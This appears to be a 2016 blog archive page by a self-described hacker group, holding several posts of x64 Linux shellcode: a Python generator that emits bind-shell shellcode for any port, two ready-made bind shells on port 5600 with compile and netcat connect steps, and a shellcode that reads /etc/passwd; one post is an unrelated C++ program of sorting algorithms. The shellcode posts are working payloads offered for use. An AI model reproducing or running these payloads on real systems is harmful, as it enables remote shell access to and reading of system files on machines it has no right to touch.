April 2016

Saturday 23 April 2016

Linux x64 - Bind Shell shellcode Generator

Ajith KP April 23, 2016

Hi GuyZ,
This is another shellcode generator by _TERMINAL_CODERS_. This python program can generate the bind shell shellcode for desired port. The port number must between 501 and 9997.

Source Code

#!/bin/python
import socket
import sys 
"""

Linux x64 - Bind Shell shellcode Generator

---------------------------------------------------------------------------------

Disassemby of bindshell - port 5600

Disassembly of section .text:0000000000400080 <.text>:
  400080: 48 31 c0              xor    %rax,%rax
  400083: 48 31 f6              xor    %rsi,%rsi
  400086: 99                    cltd   
  400087: 6a 29                 pushq  $0x29
  400089: 58                    pop    %rax
  40008a: ff c6                 inc    %esi
  40008c: 6a 02                 pushq  $0x2
  40008e: 5f                    pop    %rdi
  40008f: 0f 05                 syscall 
  400091: 48 97                 xchg   %rax,%rdi
  400093: 6a 02                 pushq  $0x2
  400095: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp) ;;;; 0xe015 - Port of 5600
  40009c: 54                    push   %rsp
  40009d: 5e                    pop    %rsi
  40009e: 52                    push   %rdx
  40009f: 6a 10                 pushq  $0x10
  4000a1: 5a                    pop    %rdx
  4000a2: 6a 31                 pushq  $0x31
  4000a4: 58                    pop    %rax
  4000a5: 0f 05                 syscall 
  4000a7: 50                    push   %rax
  4000a8: 5e                    pop    %rsi
  4000a9: 6a 32                 pushq  $0x32
  4000ab: 58                    pop    %rax
  4000ac: 0f 05                 syscall 
  4000ae: 6a 2b                 pushq  $0x2b
  4000b0: 58                    pop    %rax
  4000b1: 0f 05                 syscall 
  4000b3: 48 97                 xchg   %rax,%rdi
  4000b5: 6a 03                 pushq  $0x3
  4000b7: 5e                    pop    %rsi
  4000b8: ff ce                 dec    %esi
  4000ba: b0 21                 mov    $0x21,%al
  4000bc: 0f 05                 syscall 
  4000be: 75 f8                 jne    0x4000b8
  4000c0: 48 31 c0              xor    %rax,%rax
  4000c3: 99                    cltd   
  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
  4000cb: 2f 73 68 
  4000ce: 53                    push   %rbx
  4000cf: 54                    push   %rsp
  4000d0: 5f                    pop    %rdi
  4000d1: 6a 3b                 pushq  $0x3b
  4000d3: 58                    pop    %rax
  4000d4: 0f 05                 syscall
 ---------------------------------------------------------------------------------
 b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
 
 Om Asato Maa Sad-Gamaya |
 Tamaso Maa Jyotir-Gamaya |
 Mrtyor-Maa Amrtam Gamaya |
 Om Shaantih Shaantih Shaantih |
"""
bann3r = '''
 [][][][][][][][][][][][][][][][][][][][][][][]
 []                                          []
 []      c0d3d by Ajith Kp [ajithkp560]      []
 []   http://www.terminalcoders.blogspot.in  []
 []                                          []
 [][][][][][][][][][][][][][][][][][][][][][][]
'''
print bann3r
usage = "Usage: "+sys.argv[0]+" <port number (501<= port <= 9997)>"
example = "Example: "+sys.argv[0]+" 5600"
code1 = "\\x48\\x31\\xc0\\x48\\x31\\xf6\\x99\\x6a\\x29\\x58\\xff\\xc6\\x6a\\x02\\x5f\\x0f\\x05\\x48\\x97\\x6a\\x02\\x66\\xc7\\x44\\x24\\x02"
code2 = "\\x54\\x5e\\x52\\x6a\\x10\\x5a\\x6a\\x31\\x58\\x0f\\x05\\x50\\x5e\\x6a\\x32\\x58\\x0f\\x05\\x6a\\x2b\\x58\\x0f\\x05\\x48\\x97\\x6a\\x03\\x5e\\xff\\xce\\xb0\\x21\\x0f\\x05\\x75\\xf8\\x48\\x31\\xc0\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05"
if len(sys.argv)!=2:
 print usage
 print example
else:
 port = "\\x"+("\\x").join([''.join(x) for x in zip(*[list(str(hex(socket.htons(int(sys.argv[1])))[2:])[z::2]) for z in range(2)])][::-1])#str(hex(socket.htons(int(sys.argv[1])))[2:])
 sh311code = code1 + port + code2
 print '// Port = '+sys.argv[0]+' --- (501<= port <= 9997)'
 print '// Compile with'
 print '// $ gcc -o output source.c'
 print '// $ execstack -s output'
 print '// $ ./output'
 print '// $ ./output'
 print '////////////////////////////////////////////\n'
 print '# include <stdio.h>'
 print 'char sh[] = "'+sh311code+'";'
 print 'main(int argc, char **argv)'
 print '''{
            int (*func)();
            func = (int (*)()) sh;
            (int)(*func)();'''
 print '}'
 print '\n////////////////////////////////////////////'

x64

Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes

Ajith KP April 23, 2016

Hi guyZ,
This is another shellcode developed by _TERMINAL_CODERS_. The shellcode can bind port 5600 and execute the commands received from hacker.

Source Code

/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes
 
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
 
0000000000400080 <.text>:
  400080: 48 31 c0              xor    %rax,%rax
  400083: 48 31 f6              xor    %rsi,%rsi
  400086: 99                    cltd   
  400087: 6a 29                 pushq  $0x29
  400089: 58                    pop    %rax
  40008a: ff c6                 inc    %esi
  40008c: 6a 02                 pushq  $0x2
  40008e: 5f                    pop    %rdi
  40008f: 0f 05                 syscall 
  400091: 48 97                 xchg   %rax,%rdi
  400093: 6a 02                 pushq  $0x2
  400095: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp)
  40009c: 54                    push   %rsp
  40009d: 5e                    pop    %rsi
  40009e: 52                    push   %rdx
  40009f: 6a 10                 pushq  $0x10
  4000a1: 5a                    pop    %rdx
  4000a2: 6a 31                 pushq  $0x31
  4000a4: 58                    pop    %rax
  4000a5: 0f 05                 syscall 
  4000a7: 50                    push   %rax
  4000a8: 5e                    pop    %rsi
  4000a9: 6a 32                 pushq  $0x32
  4000ab: 58                    pop    %rax
  4000ac: 0f 05                 syscall 
  4000ae: 6a 2b                 pushq  $0x2b
  4000b0: 58                    pop    %rax
  4000b1: 0f 05                 syscall 
  4000b3: 48 97                 xchg   %rax,%rdi
  4000b5: 6a 03                 pushq  $0x3
  4000b7: 5e                    pop    %rsi
  4000b8: ff ce                 dec    %esi
  4000ba: b0 21                 mov    $0x21,%al
  4000bc: 0f 05                 syscall 
  4000be: 75 f8                 jne    0x4000b8
  4000c0: 48 31 c0              xor    %rax,%rax
  4000c3: 99                    cltd   
  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
  4000cb: 2f 73 68 
  4000ce: 53                    push   %rbx
  4000cf: 54                    push   %rsp
  4000d0: 5f                    pop    %rdi
  4000d1: 6a 3b                 pushq  $0x3b
  4000d3: 58                    pop    %rax
  4000d4: 0f 05                 syscall
 
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell
 
How to Connect
 
$ nc <HOST IP ADDRESS> 5600
 
Eg:
 
$ nc 127.0.0.1 5600
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
void main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) sh;
    (int)(*func)();
}

Wednesday 20 April 2016

Programming Languages Theory

Sort Algorithms: Quick Sort, Merge Sort, Radix Sort, Heap Sort and Shell Sort in One Program

Ajith KP April 20, 2016

Hi GuyZ,
This is the source code which contains Quick Sort, Merge Sort, Radix Sort, Heap Sort and Shell Sort algorithms implementation.

Source Code

#include <iostream>
#include <queue>
#include <cmath>
using namespace std;
class Show{
public:
    void show(int *arr, int n){
        cout<<"Sorted List: ";
        for (int i=0;i<n;i++){
            cout<<arr[i]<<" ";
        }
        cout<<endl;
    }
};

class merge:public Show{
    int a[1024], sort[1024], n, i, j, tmp, k;


    void divide(int beg, int end){
        if((end-beg)>=1){
            int mid = (beg+end)/2;
            divide(beg, mid);
            divide(mid+1, end);
            arrange(beg, mid, end);
        }
    }
    void arrange(int beg, int mid, int end){
        i=k=beg;
        j=mid+1;
        while(i<=mid && j<=end){
            if(a[i]<a[j]){
                sort[k++]=a[i++];
            }
            else{
                sort[k++]=a[j++];
            }
        }
        while(i<=mid){
            sort[k++]=a[i++];
        }
        while(j<=end){
            sort[k++]=a[j++];
        }
        for(i=beg;i<=end;i++){
            a[i]=sort[i];
        }
    }
public:
    void read(){
        cout<<"Enter limit: ";
        cin>>n;
        cout<<"Enter "<<n<<" items: ";
        for(i=0;i<n;i++){
            cin>>a[i];
        }
        divide(0, n-1);
        show(a, n);
    }
};

class heapsort:public Show{
    int n, arr[1024], tarr[1024];

    int buildTree(int n){
        tarr[1] = arr[0];
        int i = 2;
        while(i<=n){
            tarr[i] = arr[i-1];
            int parent = i/2;
            int base = i;
            while(tarr[parent]<tarr[i] && parent>0){
                int t = tarr[parent];
                tarr[parent] = tarr[i];
                tarr[i] = t;
                parent = parent/2;
                i = parent;
            }
            i = base+1;
        }
        int j = 0;
        for(i=2;i<n+1;i++){
            arr[j++] = tarr[i];
        }
        return tarr[1];
    }
public:
    void read(){
        cout<<"Enter the limit: ";
        cin>>n;
        cout<<"Enter "<<n<<" items: ";
        for(int i=0;i<n;i++){
            cin>>arr[i];
        }
        int t = n;
        while(t){
            arr[t-1] = buildTree(t); 
            t--;
    }
    show(arr, n);
    }
};

class quick:public Show{
    int a[1024], i, j, tmp, n;

    void quickSort(int *a, int beg, int end){
        if(beg<end){
            int pivot = partition(a, beg, end);
            quickSort(a, beg, pivot-1);
            quickSort(a, pivot+1, end);
        }
    }
    int partition(int *a, int beg, int end){
        int pivot = a[beg];
        int flg = false;
        i = beg+1; j = end;
        while(!flg){
            while(i<=j && a[i]<=pivot){
                i++;
            }
            while(j>=i && a[j]>=pivot){
                j--;
            }
            if(j<i){
                flg = true;
            }
            else {
                tmp = a[i];
                a[i] = a[j];
                a[j] = tmp;
            }
        }
        tmp = a[beg];
        a[beg] = a[j];
        a[j] = tmp;
        return j;
    }
public:
    void read(){
        cout<<"Enter limit: ";
        cin>>n;
        cout<<"Enter "<<n<<" items: ";
        for(i=0;i<n;i++){
            cin>>a[i];
        }
        quickSort(a, 0, n-1);
        show(a, n);
    }
};

class shellsort:public Show{
    int n, x, arr[1024];

    void arrange(int *arr, int start, int x, int l){
        int i = start+x;
        while(i<l){
            int val = arr[i];
            int pos = i;
            while(pos>=x && arr[pos-x]>val){
                arr[pos] = arr[pos-x];
                pos = pos-x;
            }
            arr[pos] = val;
            i++;
        }
    }
    void shells(int *arr, int l){
        int start = l/2;
        while(start>0){
            for(int i=0;i<start;i++){
                arrange(arr, i, start, l);
            }
            start=start/2;
        }
    }
public:
    void read(){
        cout<<"Enter limit: ";
        cin>>n;
        cout<<"Enter "<<n<<" items: ";
        for(int i=0;i<n;i++)cin>>arr[i];
        shells(arr, n);
        show(arr, n);
    }
};

class radix:public Show{
    int arr[1024], n, flg, i, nw, d, t;
public:
    void read(){
        cout<<"Enter limit: ";
        cin>>n;
        cout<<"Enter "<<n<<" items: ";
        for(i=0;i<n;i++){
            cin>>arr[i];
        }
        flg = 0;
        d = 1;
        while(!flg){
            flg = 1;
            queue<int> Q[10];
            queue<int> QN[10];
            for(i=0;i<n;i++){
                nw = abs(arr[i]/d);
                if(nw>9){
                    flg = 0;
                }
                if(arr[i]<0)
                    QN[nw%10].push(arr[i]);
                else
                    Q[nw%10].push(arr[i]);
            }
            t = 0;
            for(i=9;i>=0;i--){
                while(!QN[i].empty()){
                    arr[t++] = QN[i].front();
                    QN[i].pop();
                }
            }
            for(i=0;i<10;i++){
                while(!Q[i].empty()){
                    arr[t++] = Q[i].front();
                    Q[i].pop();
                }
            }
            d = d*10;
        }
        show(arr, n);
    }
};
class menu{
    int opt;
    heapsort hs;
    shellsort ss;
    radix r;
    quick q;
    merge m;
public:
    void read(){
        opt = 0;
        cout<<"\n\t\t\tMENU\n1. Heap Sort\n2. Shell Sort\n3. Radix Sort\n4. Quick Sort\n5. Merge Sort\n6. Exit";
        while(opt!=6){
            cout<<"\nOption: ";
            cin>>opt;
            switch(opt){
                case 1:
                    hs.read();
                    break;
                case 2:
                    ss.read();
                    break;
                case 3:
                    r.read();
                    break;
                case 4:
                    q.read();
                    break;
                case 5:
                    m.read();
                    break;
                case 6:
                    break;
                default:
                    cout<<"Option Error: Try again...";
                    break;
            }
        }
    }
};
int main()
{
    menu m;
    m.read();
}

Friday 15 April 2016

x64

Linux/x86_64 - Read /etc/passwd - 65 bytes

Ajith KP April 15, 2016

Hi GuyZ,
This is another shellcodes shared by _TERMINAL_CODERS_.

Source Code

>/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - Read /etc/passwd - 65 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

Disassembly of section .text:

0000000000400080 <.text>:
  400080: eb 2f                 jmp    0x4000b1
  400082: 5f                    pop    rdi
  400083: 6a 02                 push   0x2
  400085: 58                    pop    rax
  400086: 48 31 f6              xor    rsi,rsi
  400089: 0f 05                 syscall 
  40008b: 66 81 ec ef 0f        sub    sp,0xfef
  400090: 48 8d 34 24           lea    rsi,[rsp]
  400094: 48 97                 xchg   rdi,rax
  400096: 48 31 d2              xor    rdx,rdx
  400099: 66 ba ef 0f           mov    dx,0xfef
  40009d: 48 31 c0              xor    rax,rax
  4000a0: 0f 05                 syscall 
  4000a2: 6a 01                 push   0x1
  4000a4: 5f                    pop    rdi
  4000a5: 48 92                 xchg   rdx,rax
  4000a7: 6a 01                 push   0x1
  4000a9: 58                    pop    rax
  4000aa: 0f 05                 syscall 
  4000ac: 6a 3c                 push   0x3c
  4000ae: 58                    pop    rax
  4000af: 0f 05                 syscall 
  4000b1: e8 cc ff ff ff        call   0x400082
  4000b6: 2f                    (bad)  
  4000b7: 65 74 63              gs je  0x40011d
  4000ba: 2f                    (bad)  
  4000bb: 70 61                 jo     0x40011e
  4000bd: 73 73                 jae    0x400132
  4000bf: 77 64                 ja     0x400125

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o read_passwd read_passwd.c
$ execstack -s read_passwd
$ ./read_passwd

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
void main(int argc, char **argv)
{
 int (*func)();
 func = (int (*)()) sh;
 (int)(*func)();
}

Monday 11 April 2016

x64

Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes

Ajith KP April 11, 2016

Hi GuyZ,
This is another shellcode by _TERMINAL_CODERS_. You can find this fro, here: https://www.exploit-db.com/exploits/39684/

Source Code

/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080:   99                      cdq    
  400081:   6a 29                   push   0x29
  400083:   58                      pop    rax
  400084:   6a 01                   push   0x1
  400086:   5e                      pop    rsi
  400087:   6a 02                   push   0x2
  400089:   5f                      pop    rdi
  40008a:   0f 05                   syscall 
  40008c:   48 97                   xchg   rdi,rax
  40008e:   6a 02                   push   0x2
  400090:   66 c7 44 24 02 15 e0    mov    WORD PTR [rsp+0x2],0xe015
  400097:   54                      push   rsp
  400098:   5e                      pop    rsi
  400099:   52                      push   rdx
  40009a:   6a 10                   push   0x10
  40009c:   5a                      pop    rdx
  40009d:   6a 31                   push   0x31
  40009f:   58                      pop    rax
  4000a0:   0f 05                   syscall 
  4000a2:   50                      push   rax
  4000a3:   5e                      pop    rsi
  4000a4:   6a 32                   push   0x32
  4000a6:   58                      pop    rax
  4000a7:   0f 05                   syscall 
  4000a9:   6a 2b                   push   0x2b
  4000ab:   58                      pop    rax
  4000ac:   0f 05                   syscall 
  4000ae:   48 97                   xchg   rdi,rax
  4000b0:   6a 03                   push   0x3
  4000b2:   5e                      pop    rsi
  4000b3:   48 ff ce                dec    rsi
  4000b6:   6a 21                   push   0x21
  4000b8:   58                      pop    rax
  4000b9:   0f 05                   syscall 
  4000bb:   75 f6                   jne    0x4000b3
  4000bd:   99                      cdq    
  4000be:   52                      push   rdx
  4000bf:   48 b9 2f 62 69 6e 2f    movabs rcx,0x68732f2f6e69622f
  4000c6:   2f 73 68 
  4000c9:   51                      push   rcx
  4000ca:   54                      push   rsp
  4000cb:   5f                      pop    rdi
  4000cc:   6a 3b                   push   0x3b
  4000ce:   58                      pop    rax
  4000cf:   0f 05                   syscall 

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell

How to Connect

$ nc <HOST IP ADDRESS> 5600

Eg:

$ nc 127.0.0.1 5600

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05";
void main(int argc, char **argv)
{
 int (*func)();
 func = (int (*)()) sh;
 (int)(*func)();
}